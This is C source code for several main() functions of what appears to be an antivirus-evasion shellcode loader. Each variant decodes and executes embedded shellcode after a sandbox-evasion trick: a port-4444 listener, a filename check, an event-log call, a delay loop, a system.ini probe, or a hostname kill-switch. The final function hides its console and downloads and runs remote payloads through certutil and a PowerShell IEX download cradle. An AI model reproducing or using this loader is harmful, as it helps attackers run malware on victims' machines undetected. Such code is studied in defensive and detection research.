int main (int argc, char **argv) { unsigned char *shellcode; unsigned char buffer[]="the encoded shellcode here"; int size = sizeof(buffer); shellcode = decode_shellcode(buffer,shellcode,size); exec_shellcode(shellcode); }
int main (int argc, char **argv) { //unsigned char *buffer; unsigned char *shellcode; unsigned char buffer[]= "encrypted shellcode"; WSADATA WsaDat; if(WSAStartup(MAKEWORD(2,2),&WsaDat)!=0) { WSACleanup(); return 0; } SOCKET Socket=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP); if(Socket==INVALID_SOCKET) { WSACleanup(); return 0; } SOCKADDR_IN serverInf; serverInf.sin_family=AF_INET; serverInf.sin_addr.s_addr=INADDR_ANY; serverInf.sin_port=htons(4444); if(bind(Socket,(SOCKADDR*)(&serverInf),sizeof(serverInf))==SOCKET_ERROR) { WSACleanup(); return 0; } listen(Socket,1); SOCKET TempSock=SOCKET_ERROR; while(TempSock==SOCKET_ERROR) { TempSock=accept(Socket,NULL,NULL); } Socket=TempSock; char *szMessage="Welcome to the server!\r\n"; send(Socket,szMessage,strlen(szMessage),0); shutdown(Socket,SD_SEND); closesocket(Socket); WSACleanup(); int size = sizeof(buffer); shellcode = decode_shellcode(buffer,shellcode,size); exec_shellcode(shellcode); }
int main (int argc, char **argv) { unsigned char *shellcode; unsigned char buffer[]= "strstr.c"; if(strstr(argv[0], "strstr.exe") > 0) { int size = sizeof(buffer); shellcode = decode_shellcode(buffer,shellcode,size); exec_shellcode(shellcode); } }
int main (int argc, char **argv) { unsigned char *shellcode; unsigned char buffer[]= "encoded shellcode"; HANDLE h; h = OpenEventLog( NULL, "Application"); if (h == NULL) printf("error\n"); int size = sizeof(buffer); shellcode = decode_shellcode(buffer,shellcode,size); exec_shellcode(shellcode); }
int main (int argc, char **argv) { //unsigned char *buffer; unsigned char *shellcode; unsigned char buffer[]= "encoded shellcode"; int x,y; for (x=1; x<10000; x++) { for (y=1; y<10000; y++) { int a=cos(x); int b=cos(y); double c=sin(x); double d=sin(y); } } int size = sizeof(buffer); shellcode = decode_shellcode(buffer,shellcode,size); exec_shellcode(shellcode); }
int main (int argc, char **argv) { #ifdef QUIET ShowWindow(GetConsoleWindow(), SW_HIDE); #endif char *fvalue = NULL; char *uvalue = NULL; int index; int c; opterr = 0; // do evading here with fopen technique #ifdef SANDBOX_FOPEN #ifdef PRINT_DEBUG printf("use fopen sandbox escape\n"); #endif FILE *fp = fopen("c:\\windows\\system.ini", "rb"); if (fp == NULL) return 0; fclose(fp); #endif //evading with gethostbyname technique #ifdef KVALUE #ifdef PRINT_DEBUG printf("use gethostbyname sandbox evasion\n"); #endif struct hostent *hp = gethostbyname(KVALUE); if (hp != NULL) exit(0); #endif //#if defined(DOWNLOADCERTUTIL) || defined(DOWNLOADPOWERSHELL) //download a file and write to disk #ifdef DOWNLOADCERTUTIL char download[500]; //how not to do it... sprintf(download,"certutil.exe -urlcache -split -f %s",argv[2]); #ifdef PRINT_DEBUG printf("url: %s\n", download); #endif system(download); #ifdef PRINT_DEBUG printf("download done\n"); #endif #endif #ifdef DOWNLOADPOWERSHELL char download[500]; sprintf(download,"powershell.exe \"IEX ((new-object net.webclient).downloadstring('%s'))\"",argv[2]); #ifdef PRINT_DEBUG printf("url: %s\n", download); #endif system(download); #endif #ifdef LVALUE fvalue=argv[1]; #endif #ifdef PRINT_DEBUG printf ("fvalue = %s ", fvalue); printf ("uvalue = %s \n", uvalue); for (index = optind; index < argc; index++) printf ("Non-option argument %s\n", argv[index]); #endif // compute #defines from defs.h #ifdef FVALUE int size = strlen(FVALUE); fvalue=(char*)malloc(size); strcpy(fvalue,FVALUE); #endif #ifdef UVALUE int size = strlen(UVALUE); uvalue=(char*)malloc(size); strcpy(uvalue,UVALUE); #endif // exec shellcode from a given file or from defs.h if (fvalue) { unsigned char *buffer; unsigned char *shellcode; int size; //#ifndef FVALUE #ifdef LVALUE #ifdef PRINT_DEBUG printf("exec shellcode from file\n"); #endif size = get_filesize(fvalue); buffer = load_textfile(fvalue, buffer, size); #endif #ifdef FVALUE size = strlen (FVALUE); buffer = FVALUE; #endif #ifdef ENCRYPT #ifdef PRINT_DEBUG printf ("size %d\n",size); //printf ("%s\n",FVALUE); printf("exec shellcode with decode_shellcode\n"); #endif shellcode = decode_shellcode(buffer,shellcode,size); #endif #ifndef ENCRYPT #ifdef LVALUE unsigned char *buf = buffer; //that does the trick, although not nice. Needed for raw sc execution with -l #endif #ifndef ASCIIMSF #ifndef DOWNLOADEXECSC #ifdef PRINT_DEBUG printf("exec shellcode without decode_shellcode\n"); #endif shellcode = buf; #endif #endif #endif #ifndef X64 #ifndef ASCIIMSF exec_shellcode(shellcode); #endif #ifdef ASCIIMSF exec_shellcode_ASCIIMSF(shellcode); #endif #endif #ifdef X64 exec_shellcode64(shellcode); #endif } // exec from url #ifdef UVALUE else if (uvalue) { #ifdef PRINT_DEBUG printf("exec shellcode from url\n"); #endif char *sh_filename; sh_filename = ie_download(uvalue, sh_filename); int x=strlen(sh_filename); #ifdef PRINT_DEBUG printf("\n\n%d\n\n", x); #endif unsigned char *buffer; unsigned char *shellcode; int size = get_filesize(sh_filename); buffer = load_textfile(sh_filename, buffer, size); #ifdef ENCRYPT shellcode = decode_shellcode(buffer,shellcode,size); #else shellcode = buf; #endif #ifndef X64 exec_shellcode(shellcode); #endif #ifdef X64 exec_shellcode64(shellcode); #endif } #endif #ifdef DOWNLOADEXECSC unsigned char *shellcode = downloadshellcode(argv[1]); #ifndef X64 exec_shellcode(shellcode); #endif #ifdef X64 exec_shellcode64(shellcode); #endif #endif return 0; }